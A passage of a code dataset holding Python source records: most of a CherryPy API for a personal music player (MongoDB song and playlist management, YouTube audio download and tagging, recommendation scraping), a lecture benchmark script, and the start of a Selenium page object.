[(string)],\n\t\t\t\t\"sortby\": (string, default \"date\", [\"date\", \"relev\", \"name\"]),\n\t\t\t\t\"descend\": (boolean, default True, True=descending),\n\t\t\t\t# \"page\": (integer, default 0)\n\t\t\t}\n\n\t\tReturns: {\n\t\t\t\"results\": [{results}],\n\t\t\t\"count\": (int)\n\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\treturn m_utils.makeMusicQuery(data, self.musicDB())\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef findMusicList(self):\n\t\t\"\"\"\n\t\tReturns a list of songs matching the ids specified in a list. To be used in conjunction with playlist contents\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"content\": [(_id)]\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\tif \"content\" in data:\n\t\t\t# print(\"finding:\", data[\"content\"])\n\t\t\t# idList = [ObjectId(i) for i in data[\"content\"]]\n\t\t\tidList = [m_utils.checkValidID(i) for i in m_utils.checkValidData(\"content\", data, list)]\n\t\t\t# for x in idList:\n\t\t\t# if not ObjectId.is_valid(x):\n\t\t\t# raise cherrypy.HTTPError(400, \"Bad song id\")\n\t\t\t#return in order requested: from https://stackoverflow.com/questions/22797768/does-mongodbs-in-clause-guarantee-order/22800784\n\t\t\t# stack = []\n\t\t\t# i = len(idList) - 1\n\t\t\t# if i <= 0:\n\t\t\t# \treturn []\n\t\t\t# while i > 0:\n\t\t\t# \trec = {\n\t\t\t# \t\t\"$cond\": [{\n\t\t\t# \t\t\t\"$eq\": [\"$_id\", idList[i - 1]]\n\t\t\t# \t\t},\n\t\t\t# \t\ti]\n\t\t\t# \t}\n\t\t\t# \tif len(stack) == 0:\n\t\t\t# \t\trec[\"$cond\"].append(i + 1)\n\t\t\t# \telse:\n\t\t\t# \t\trec[\"$cond\"].append(stack.pop())\n\t\t\t# \tstack.append(rec)\n\t\t\t# \ti -= 1\n\t\t\t# projectStage = {\"$project\": {\"order\": stack[0]}}\n\t\t\t# for f in musicFields:\n\t\t\t# \tprojectStage[\"$project\"][f] = 1\n\t\t\t# pipeline = [\n\t\t\t# \t{\"$match\": {\"_id\": {\"$in\": idList}}},\n\t\t\t# \t# {\"$project\": {\"order\": stack[0]}},\n\t\t\t# \tprojectStage,\n\t\t\t# \t{\"$sort\": {\"order\": 1}}\n\t\t\t# ]\n\t\t\t# return m_utils.cleanRet(self.colMusic.aggregate(pipeline))\n\t\t\tret = []\n\t\t\tfor i in idList:\n\t\t\t\tres = self.musicDB().find_one({\"_id\": i})\n\t\t\t\tif res == None:\n\t\t\t\t\traise cherrypy.HTTPError(400, \"Invalid id in playlist contents\")\n\t\t\t\tret.append(res)\n\t\t\treturn m_utils.cleanRet(ret)\n\t\t\t# return m_utils.cleanRet(list(self.colMusic.find({\"_id\": {\"$in\": data[\"content\"]}})))\n\t\traise cherrypy.HTTPError(400, \"No playlist content data given\")\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef editMusic(self):\n\t\t\"\"\"\n\t\tEdits a list of songs\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"url\": (string) (optional),\n\t\t\t\t\"type\": (string) (optional),\n\t\t\t\t\"name\": (string) (optional),\n\t\t\t\t\"artist\": [(string)] (optional),\n\t\t\t\t\"album\": (string) (optional),\n\t\t\t\t\"genre\": (string) (optional),\n\t\t\t\t\"vol\": (int) (optional),\n\t\t\t\t\"start\": (int) (optional),\n\t\t\t\t\"end\": (int) (optional),\n\t\t\t\t\"_id\": [(string)]\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\tmyIDList = [m_utils.checkValidID(i) for i in m_utils.checkValidData(\"_id\", data, list)]\n\t\tfor i in myIDList:\n\t\t\tif self.musicDB().count({\"_id\": i}) == 0:\n\t\t\t\traise cherrypy.HTTPError(400, \"Song does not exist\")\n\n\t\t# sanitize the input\n\t\tmyQuery = {}\n\t\tfor key in [\"url\", \"type\", \"name\", \"artist\", \"album\", \"genre\", \"vol\", \"start\", \"end\"]:\n\t\t\tif key in data:\n\t\t\t\tif key == \"artist\":\n\t\t\t\t\tmyQuery[key] = []\n\t\t\t\t\tfor artist in m_utils.checkValidData(key, data, list):\n\t\t\t\t\t\tif isinstance(artist, str):\n\t\t\t\t\t\t\tmyQuery[key].append(artist)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\traise cherrypy.HTTPError(400, \"Invalid artist provided\")\n\t\t\t\telif key == \"type\":\n\t\t\t\t\tif m_utils.checkValidData(key, data, str) in m_utils.supportedTypes:\n\t\t\t\t\t\tmyQuery[key] = data[key]\n\t\t\t\t\telse:\n\t\t\t\t\t\traise cherrypy.HTTPError(400, \"Invalid data type provided\")\n\t\t\t\telif key in [\"vol\", \"start\", \"end\"]:\n\t\t\t\t\tmyQuery[key] = m_utils.checkValidData(key, data, int)\n\t\t\t\telse:\n\t\t\t\t\tmyQuery[key] = m_utils.checkValidData(key, data, str)\n\n\t\tmyQuery[\"date\"] = datetime.now()\n\t\tinserted = self.musicDB().update_many({\"_id\": {\"$in\": myIDList}}, {\"$set\": myQuery})\n\t\t#TODO: update artist, album, genre DBs\n\t\tprint(\"updated music:\", inserted.raw_result)\n\t\treturn m_utils.makeMusicQuery({\"_id\": myIDList}, self.musicDB())\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@authUser\n\tdef removeMusic(self):\n\t\t\"\"\"\n\t\tRemoves a list of songs from the database\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"music\": [(string of _id)]\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\tdata = m_utils.checkValidData(\"music\", data, list)\n\t\tmyData = []\n\t\tfor myID in data:\n\t\t\tmyData.append(m_utils.checkValidID(myID))\n\n\t\tself.musicDB().remove({\"_id\": {\"$in\": myData}})\n\t\t# now remove from all playlists\n\t\tself.playlistDB().update_many({}, {\n\t\t\t\"$pull\": {\"contents\": {\"$in\": myData}}\n\t\t});\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef addPlaylist(self):\n\t\t\"\"\"\n\t\tAdd a playlist to the database\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"name\": (string),\n\t\t\t\t\"contents\": [(_id)]\n\t\t\t}\n\n\t\tReturns:\n\t\t\t{\n\t\t\t\t\"_id\": (_id)\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tprint(\"adding playlist\");\n\t\tmyPlaylist = dict()\n\n\t\tmyPlaylist[\"name\"] = m_utils.checkValidData(\"name\", data, str)\n\t\tif len(myPlaylist[\"name\"]) == 0:\n\t\t\traise cherrypy.HTTPError(400, \"Invalid playlist name\")\n\t\tmyPlaylist[\"date\"] = datetime.now()\n\t\tcontentList = m_utils.checkValidData(\"contents\", data, list)\n\t\tmyContent = []\n\t\tfor song in contentList:\n\t\t\tif self.musicDB().count({\"_id\": m_utils.checkValidID(song)}) > 0:\n\t\t\t\tmyContent.append(song)\n\t\t\telse:\n\t\t\t\traise cherrypy.HTTPError(400, \"Invalid song ID\")\n\t\tmyPlaylist[\"contents\"] = myContent\n\t\tmyPlaylist[\"date\"] = datetime.now()\n\n\t\t# add to database\n\t\tinserted = self.playlistDB().insert(myPlaylist)\n\n\t\tmyPlaylist[\"_id\"] = str(inserted)\n\t\treturn m_utils.cleanRet(myPlaylist)\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef findPlaylist(self):\n\t\t\"\"\"\n\t\tReturns a list of playlists matching the query\n\n\t\tExpected input (no field present -> return all):\n\t\t\t{\n\t\t\t\t\"playlist_names\": [(string)],\n\t\t\t\t\"start_date\": (datetime),\n\t\t\t\t\"end_date\": (datetime),\n\t\t\t\t\"artist_names\": [(string)],\n\t\t\t\t\"song_names\": [(string)],\n\t\t\t\t\"album_names\": [(string)],\n\t\t\t\t\"genre_names\": [(string)],\n\t\t\t\t\"_id\": (string)\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\treturn m_utils.makePlaylistQuery(data, self.playlistDB(), self.musicDB())\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef editPlaylist(self):\n\t\t\"\"\"\n\t\tEdits the name or contents of a playlist\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"_id\": ObjectID,\n\t\t\t\t\"name\": (string) (optional),\n\t\t\t\t\"contents\": [(_id)] (optional)\n\t\t\t}\n\n\t\tReturns the resolved contents of the updated playlist\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\tprint(\"editing playlist\")\n\t\tmyID = m_utils.checkValidID(data)\n\t\tif self.playlistDB().count({\"_id\": myID}) == 0:\n\t\t\traise cherrypy.HTTPError(400, \"Playlist does not exist\")\n\n\t\tmyPlaylist = dict()\n\t\tif \"name\" in data:\n\t\t\tmyPlaylist[\"name\"] = m_utils.checkValidData(\"name\", data, str)\n\t\tif \"contents\" in data:\n\t\t\tcontentList = m_utils.checkValidData(\"contents\", data, list)\n\t\t\tmyContent = []\n\t\t\tfor song in contentList:\n\t\t\t\tif self.musicDB().count({\"_id\": m_utils.checkValidID(song)}) > 0:\n\t\t\t\t\tmyContent.append(ObjectId(song))\n\t\t\t\telse:\n\t\t\t\t\traise cherrypy.HTTPError(400, \"Invalid song ID\")\n\t\t\tmyPlaylist[\"contents\"] = myContent\n\t\tmyPlaylist[\"date\"] = datetime.now()\n\t\t# print(\"updating playlist with:\", myPlaylist)\n\n\t\tinserted = self.playlistDB().update_one({\"_id\": myID}, {\"$set\": myPlaylist})\n\t\tprint(\"updated playlist:\", inserted.raw_result)\n\t\treturn m_utils.cleanRet(self.playlistDB().find_one({\"_id\": myID}))\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@authUser\n\tdef removePlaylists(self):\n\t\t\"\"\"\n\t\tRemoves a list of playlists\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"playlists\": [(_id)]\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tif \"playlists\" in data:\n\t\t\tmyQuery = []\n\t\t\tfor i in data[\"playlists\"]:\n\t\t\t\tmyQuery.append(m_utils.checkValidID(i))\n\t\t\tself.playlistDB().delete_many({\"_id\": {\"$in\": myQuery}})\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, \"No data given\")\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\tdef checkStatus(self):\n\t\t\"\"\"\n\t\tChecks if the download thread is complete\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"name\": (string)\n\t\t\t}\n\n\t\tOutput:\n\t\t\t{\n\t\t\t\t\"completed\": (boolean)\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\tthreadName = m_utils.checkValidData(\"name\", data, str)\n\n\t\tif threadName not in downloadThreads:\n\t\t\treturn {\"completed\": True}\t#is this correct?\n\t\tif downloadThreads[threadName].isAlive():\n\t\t\treturn {\"completed\": False}\n\t\t#else thread is done, remove it and return true\n\t\tdownloadThreads[threadName].join()\n\t\tdel downloadThreads[threadName]\n\t\treturn {\"completed\": True}\n\n\tdef downloadTag(self, ytdl, dest, song, fmt):\n\t\tytdl.download([song[\"url\"]])\n\t\t# songInfo = ytdl.extract_info(song[\"url\"], download=True)\n\t\t# print(\"SONG DURATION:\", songInfo[\"duration\"])\n\t\ttargFile = os.path.join(dest, \"{}.{}\".format(song[\"name\"], fmt))\n\t\tos.rename(os.path.join(dest, \"{}.{}\".format(song[\"id\"], fmt)), targFile)\n\t\ttoTag = eyed3.load(targFile)\n\t\ttoTag.tag.title = song[\"name\"]\n\t\tif \"album\" in song:\n\t\t\ttoTag.tag.album = song[\"album\"]\n\t\tif \"artistStr\" in song:\n\t\t\ttoTag.tag.artist = song[\"artistStr\"]\n\t\tif \"genre\" in song:\n\t\t\ttoTag.tag.genre = song[\"genre\"]\n\t\ttoTag.tag.save()\n\n\tdef multiDownloadTag(self, ytdl, dest, songs, fmt):\n\t\tthreads = []\n\t\tfor s in songs:\n\t\t\tt = threading.Thread(target=self.downloadTag, args=(ytdl, dest, s, fmt))\n\t\t\tthreads.append(t)\n\t\t\tt.start()\n\t\tfor t in threads:\n\t\t\tt.join()\n\n\tdef setupDownload(self, randDir, name, songs, type, totalDuration):\n\t\t#start measuring for time to download, convert, and package\n\t\tstart = time.perf_counter()\n\t\tdownloadDir = os.path.join(DOWNLOAD_FOLDER, randDir)\n\t\tif not os.path.exists(downloadDir):\n\t\t\tos.makedirs(downloadDir)\n\t\tyt_opts = {\n\t\t\t\"format\": \"bestaudio\",\n\t\t\t\"postprocessors\": [{\n\t\t\t\t\"key\": \"FFmpegExtractAudio\",\n\t\t\t\t\"preferredcodec\": type,\n\t\t\t\t\"preferredquality\": \"0\"\n\t\t\t}],\n\t\t\t\"outtmpl\": os.path.join(downloadDir, \"%(id)s.%(ext)s\")\n\t\t}\n\t\t#download\n\t\twith youtube_dl.YoutubeDL(yt_opts) as ydl:\n\t\t\tself.multiDownloadTag(ydl, downloadDir, songs, type)\n\t\t# now zip if multiple\n\t\tif len(songs) > 1:\n\t\t\tretName = os.path.join(downloadDir, \"{}.zip\".format(name))\n\t\t\twith zipfile.ZipFile(retName, \"w\", zipfile.ZIP_DEFLATED) as myZip:\n\t\t\t\tfor f in glob.glob(os.path.join(downloadDir, \"*.{}\".format(type))):\n\t\t\t\t\tmyZip.write(f, os.path.basename(f))\n\t\t\t\t\tos.remove(f)\n\t\t#calculate exponential moving average\n\t\texec_time = round((time.perf_counter() - start) * 1000 / totalDuration)\n\t\tprint(\"Average time of execution per second of video:\", exec_time)\n\t\tglobal avgDelay\n\t\tavgDelay = round(alpha * exec_time + (1 - alpha) * avgDelay)\n\t\tprint(\"New average delay:\", avgDelay)\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef generate(self):\n\t\t\"\"\"\n\t\tDownloads a lists of songs from youtube and prepares them for client side download\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"name\": (string),\n\t\t\t\t\"songs\": [(Music dict)],\n\t\t\t\t\"type\": \"mp3\" or \"mp4\"\n\t\t\t}\n\n\t\tOutput:\n\t\t\t{\n\t\t\t\t\"path\": (path to file or zipfile)\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tfor key in [\"name\", \"songs\", \"type\"]:\n\t\t\tif key not in data:\n\t\t\t\traise cherrypy.HTTPError(400, \"Invalid download parameters\")\n\t\t\tif key != \"songs\":\n\t\t\t\tm_utils.checkValidData(key, data, str)\n\t\t\telse:\n\t\t\t\tfor s in m_utils.checkValidData(key, data, list):\n\t\t\t\t\t# print(s)\n\t\t\t\t\tif isinstance(s, dict):\n\t\t\t\t\t\tfor u in s:\n\t\t\t\t\t\t\tif u in [\"url\", \"id\", \"name\", \"album\", \"artistStr\", \"genre\"]:\n\t\t\t\t\t\t\t\t# print(u)\n\t\t\t\t\t\t\t\tm_utils.checkValidData(u, s, str)\n\t\t\t\t\t\t# print(\"passed\")\n\t\t\t\t\t\tfor k in [\"url\", \"id\", \"name\"]:\n\t\t\t\t\t\t\tif k not in s:\n\t\t\t\t\t\t\t\traise cherrypy.HTTPError(400, \"Missing {} key\".format(k))\n\t\t\t\t\telse:\n\t\t\t\t\t\traise cherrypy.HTTPError(400, \"Invalid data download\")\n\t\tif data[\"type\"] in [\"mp3\", \"mp4\"]:\n\t\t\trandDir = str(uuid4())\n\t\t\t#precompute the return paths\n\t\t\tdownloadDir = os.path.join(DOWNLOAD_FOLDER, randDir)\n\t\t\tif len(data[\"songs\"]) > 1:\n\t\t\t\tfileName = os.path.join(downloadDir, \"{}.zip\".format(data[\"name\"]))\n\t\t\telse:\n\t\t\t\tfileName = os.path.join(downloadDir, \"{}.{}\".format(data[\"name\"], data[\"type\"]))\n\t\t\t#get the total song duration\n\t\t\ttotalDuration = 0\t#in seconds\n\t\t\tfor s in data[\"songs\"]:\n\t\t\t\tsongInfo = youtube_dl.YoutubeDL({\"format\": \"worst\"}).extract_info(s[\"url\"], process=False, download=False)\n\t\t\t\tprint(\"SONG DURATION:\", songInfo[\"duration\"])\n\t\t\t\ttotalDuration += songInfo[\"duration\"]\n\t\t\t#start the download process\n\t\t\tt = threading.Thread(target=self.setupDownload, args=(randDir, data[\"name\"], data[\"songs\"], data[\"type\"], totalDuration))\n\t\t\tdownloadThreads[fileName] = t\n\t\t\tt.start()\n\t\t\t#return the info\n\t\t\treturn {\"path\": fileName, \"expected\": totalDuration * avgDelay + networkDelay}\n\t\t# if \"songs\" in data and \"type\" in data and data[\"type\"] in [\"mp3\", \"mp4\"]:\n\t\t# \trandDir = str(uuid4())\n\t\t# \tdownloadDir = os.path.join(DOWNLOAD_FOLDER, randDir)\n\t\t# \tif not os.path.exists(downloadDir):\n\t\t# \t\tos.makedirs(downloadDir)\n\t\t# \tyt_opts = {\n\t\t# \t\t\"format\": \"bestaudio\",\n\t\t# \t\t\"postprocessors\": [{\n\t\t# \t\t\t\"key\": \"FFmpegExtractAudio\",\n\t\t# \t\t\t\"preferredcodec\": data[\"type\"],\n\t\t# \t\t\t\"preferredquality\": \"0\"\n\t\t# \t\t}],\n\t\t# \t\t\"outtmpl\": os.path.join(downloadDir, \"%(id)s.%(ext)s\")\n\t\t# \t}\n\t\t# \t#download\n\t\t# \twith youtube_dl.YoutubeDL(yt_opts) as ydl:\n\t\t# \t\tself.multiDownloadTag(ydl, downloadDir, data[\"songs\"], data[\"type\"])\n\t\t# \t# now zip if multiple\n\t\t# \tretName = \"\"\n\t\t# \tif len(data[\"songs\"]) > 1:\n\t\t# \t\tretName = os.path.join(downloadDir, \"{}.zip\".format(data[\"name\"]))\n\t\t# \t\twith zipfile.ZipFile(retName, \"w\", zipfile.ZIP_DEFLATED) as myZip:\n\t\t# \t\t\tfor f in glob.glob(os.path.join(downloadDir, \"*.{}\".format(data[\"type\"]))):\n\t\t# \t\t\t\tmyZip.write(f, os.path.basename(f))\n\t\t# \t\t\t\tos.remove(f)\n\t\t# \telse:\n\t\t# \t\tretName = os.path.join(downloadDir, \"{}.{}\".format(data[\"name\"], data[\"type\"]))\n\t\t# \treturn {\"path\": retName}\n\t\t# \t# return cherrypy.lib.static.serve_download(os.path.join(absDir, retName), os.path.basename(retName))\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, \"Missing download data\")\n\n\tdef cleanupDownloads(self):\n\t\tprint(\"Started download cleanup thread\")\n\t\t# while True:\n\t\t\t# time.sleep(downloadCleanupDelay)\n\t\tglobal exit\n\t\twhile not exit.is_set():\n\t\t\tprint(\"cleaning downloads\")\n\t\t\tfor f_name in list(downloadUIDFolders.keys()):\n\t\t\t\tif (time.perf_counter() - downloadUIDFolders[f_name]) > downloadCleanupDelay:\t#can cleanup\n\t\t\t\t\tshutil.rmtree(os.path.join(DOWNLOAD_FOLDER, f_name), ignore_errors=True)\n\t\t\t\t\tdel downloadUIDFolders[f_name]\n\t\t\texit.wait(downloadCleanupDelay)\t#equivalent of sleep, but interruptible\n\n\t@cherrypy.expose\n\t@authUser\n\tdef download(self, *argv):\n\t\tprint(\"DOWNLOADING\", argv)\n\t\ttargetPath = os.path.join(*argv)\n\t\tif argv[0] != DOWNLOAD_FOLDER or not os.path.exists(targetPath) or len(argv) != 3:\t#(DOWNLOAD_FOLDER, uuid, file name)\n\t\t\traise cherrypy.HTTPError(404, \"File not found\")\n\t\tres = cherrypy.lib.static.serve_download(os.path.join(absDir, targetPath), os.path.basename(targetPath))\n\t\tdownloadUIDFolders[argv[1]] = time.perf_counter()\n\t\t# shutil.rmtree(os.path.join(argv[0], argv[1]), ignore_errors=True)\t#this removes after serving, but may remove prematurely\n\t\treturn res\n\n\t@cherrypy.expose\n\t@authUser\n\t@cherrypy.tools.json_in()\n\tdef setLast(self):\n\t\t\"\"\"\n\t\tSets the last played playlist\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"unset\": (boolean, optional),\n\t\t\t\t\"_id\": (_id, optional),\n\t\t\t\t\"name\": (string, optional),\n\t\t\t\t\"contents\": [(dict)] (optional),\t#order is important; will store the shuffled order\n\t\t\t\t\"startIndex\": (int, optional),\n\t\t\t\t\"touched\": (boolean, optional),\n\t\t\t\t\"renamed\": (str, optional),\n\t\t\t\t\"loop\": (boolean, optional),\n\t\t\t\t\"shuffle\": (boolean, optional)\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tmyQuery = {\n\t\t\t\"user\": self.getUser(),\n\t\t\t# \"playlist\": {}\n\t\t}\n\t\tunset = {}\n\n\t\tif \"unset\" in data:\n\t\t\tunset = {\"playlist._id\": \"\"}\n\t\tif \"_id\" in data:\n\t\t\tmyQuery[\"playlist._id\"] = m_utils.checkValidID(data, False)\t\t#don't store as ObjectId\n\t\tif \"name\" in data:\n\t\t\tmyQuery[\"playlist.name\"] = m_utils.checkValidData(\"name\", data, str)\n\t\tif \"contents\" in data:\n\t\t\tmyQuery[\"playlist.contents\"] = m_utils.checkValidData(\"contents\", data, list)\n\t\tif \"startIndex\" in data:\n\t\t\tmyQuery[\"playlist.startIndex\"] = m_utils.checkValidData(\"startIndex\", data, int)\n\t\tif \"touched\" in data:\n\t\t\tmyQuery[\"playlist.touched\"] = m_utils.checkValidData(\"touched\", data, bool)\n\t\tif \"renamed\" in data:\n\t\t\tmyQuery[\"playlist.renamed\"] = m_utils.checkValidData(\"renamed\", data, str)\n\t\tif \"loop\" in data:\n\t\t\tmyQuery[\"loop\"] = m_utils.checkValidData(\"loop\", data, bool)\n\t\tif \"shuffle\" in data:\n\t\t\tmyQuery[\"shuffle\"] = m_utils.checkValidData(\"shuffle\", data, bool)\n\n\t\tupdateQ = {}\n\t\tif len(unset) > 0:\n\t\t\tupdateQ[\"$unset\"] = unset\n\t\tif len(myQuery) > 1:\n\t\t\tupdateQ[\"$set\"] = myQuery\n\t\tif len(updateQ) > 0:\n\t\t\tself.colLast.update_one({\"user\": self.getUser()}, updateQ, upsert=True)\n\n\t@cherrypy.expose\n\t@authUser\n\t@cherrypy.tools.json_out()\n\tdef getLast(self):\n\t\t\"\"\"\n\t\tGets the last played playlist\n\t\t\"\"\"\n\t\tresult = self.colLast.find_one({\"user\": self.getUser()})\n\t\tif result is None:\n\t\t\treturn\n\t\t# result = result[\"playlist\"]\n\t\tif \"name\" not in result[\"playlist\"] or \"contents\" not in result[\"playlist\"]:\n\t\t\treturn\n\n\t\tdel result[\"_id\"]\n\t\treturn result\n\n\t@cherrypy.expose\n\t@authUser\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\tdef getRecc(self):\n\t\t\"\"\"\n\t\tGets the HTML page for a requested video ID\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\turlType = m_utils.checkValidData(\"type\", data, str)\n\t\tif urlType == \"youtube\":\n\t\t\tattempts = 0\n\t\t\tfailed = False\n\t\t\twhile (attempts < 3):\n\t\t\t\tprint(\"ATTEMPT:\", attempts)\n\t\t\t\ts = requests.Session()\n\t\t\t\ts.cookies.set_policy(BlockAll())\n\t\t\t\tresp = s.get(m_utils.ytBaseWatch + m_utils.checkValidData(\"vid\", data, str)).text\n\t\t\t\t#filter out only the recommended\n\t\t\t\tret = \"\"\n\t\t\t\turlSet = set()\n\t\t\t\tfailed = False\n\t\t\t\tfor node in HTMLParser(resp).css(\"li.video-list-item.related-list-item.show-video-time.related-list-item-compact-video\"):\n\t\t\t\t\t#only add if URL not in the set\n\t\t\t\t\tcurUrl = node.css_first(\"a\").attributes[\"href\"]\n\t\t\t\t\tif curUrl in urlSet:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\turlSet.add(curUrl)\n\t\t\t\t\tfor n in node.css(\"a, img\"):\n\t\t\t\t\t\tn.attrs[\"href\"] = m_utils.ytBase + curUrl\n\t\t\t\t\t#remove the .gif src in the img tag\n\t\t\t\t\tthumbnail = node.css_first(\"img\")\n\t\t\t\t\tthumbnail.attrs[\"src\"] = thumbnail.attributes[\"data-thumb\"]\n\t\t\t\t\t#remove the duration span\n\t\t\t\t\tdurSpan = node.css_first(\".content-wrapper > a > span:contains(Duration)\")\n\t\t\t\t\tif durSpan:\n\t\t\t\t\t\tdurSpan.decompose()\n\t\t\t\t\t#remove the view count\n\t\t\t\t\tviewSpan = node.css_first(\".content-wrapper > a > span.stat.view-count\")\n\t\t\t\t\tif viewSpan:\n\t\t\t\t\t\tviewSpan.decompose()\n\t\t\t\t\t#replace the li with a container div\n\t\t\t\t\tret += '
'\n\t\t\t\t\tfor n in node.iter():\n\t\t\t\t\t\tif n.html == \"\":\n\t\t\t\t\t\t\tfailed = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tret += n.html\n\t\t\t\t\tret += \"
\"\n\t\t\t\t\tif failed:\n\t\t\t\t\t\tprint(\"FAILED TO GET RECC\")\n\t\t\t\t\t\tret = \"\"\n\t\t\t\t\t\tbreak\n\t\t\t\tattempts += 1\n\t\t\tif failed:\n\t\t\t\tret = '

No recommended data

'\n\t\t\tprint(ret)\n\t\t\treturn {\"contents\": ret}\n\t\telse:\n\t\t\treturn {\"contents\": \"'

No recommended data

'\"}","repo_name":"marcusdeng22/music_player","sub_path":"src/python/music_player/apigateway.py","file_name":"apigateway.py","file_ext":"py","file_size_in_byte":28917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"15706885154","text":"import random\nfrom benchmark import BenchmarkSpace, run_benchmark\nfrom jewels import CountingStrategy, Naive, SumBuiltin\nfrom jewels import NaiveSlicing, SumSlicing, OneLiner, Cached\n\n\nNB_BOXES = 999\nSEED = 1659813756\nCANDIDATES: list[CountingStrategy] = [\n Naive(), SumBuiltin(), NaiveSlicing(), SumSlicing(), OneLiner(), Cached()\n]\nNB_QUERIES: list[int] = [250, 500, 750, 1000]\nQUERY_LENGTHS: list[int] = [50, 100, 200, 300, 400, 500]\n\ndef main():\n # Initializing the randome seed once and for all!\n random.seed(SEED)\n space = BenchmarkSpace(NB_BOXES)\n space.with_nb_queries(NB_QUERIES)\\\n .with_queries_length(QUERY_LENGTHS)\\\n .with_strategies(CANDIDATES)\n run_benchmark(space)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ace-lectures/SFWRENG_3XB3","sub_path":"lectures/03_optim/benchmark_sequential.py","file_name":"benchmark_sequential.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"11460733606","text":"from page_objects.base_page import BasePage\nfrom .locators import CertificadoLocator\nfrom utils.file_utils import FileUtils\nimport time\nfrom selenium.common.exceptions import TimeoutException\n\n\n\nclass Certificado(BasePage):\n def __init__(self, driver):\n super().__init__(driver)\n self.__locators = CertificadoLocator()\n\n def completar_info_basica(self, img, fecha):\n time.sleep(5)\n self.driver.execute_script(\n '$(\"#fecha_certificado\").val(\"'+fecha+'\")')\n time.sleep(5)\n self.find_element(self.__locators.AGREGAR_IMG_BTN).click()\n FileUtils.seleccionar_img_gui(img)\n 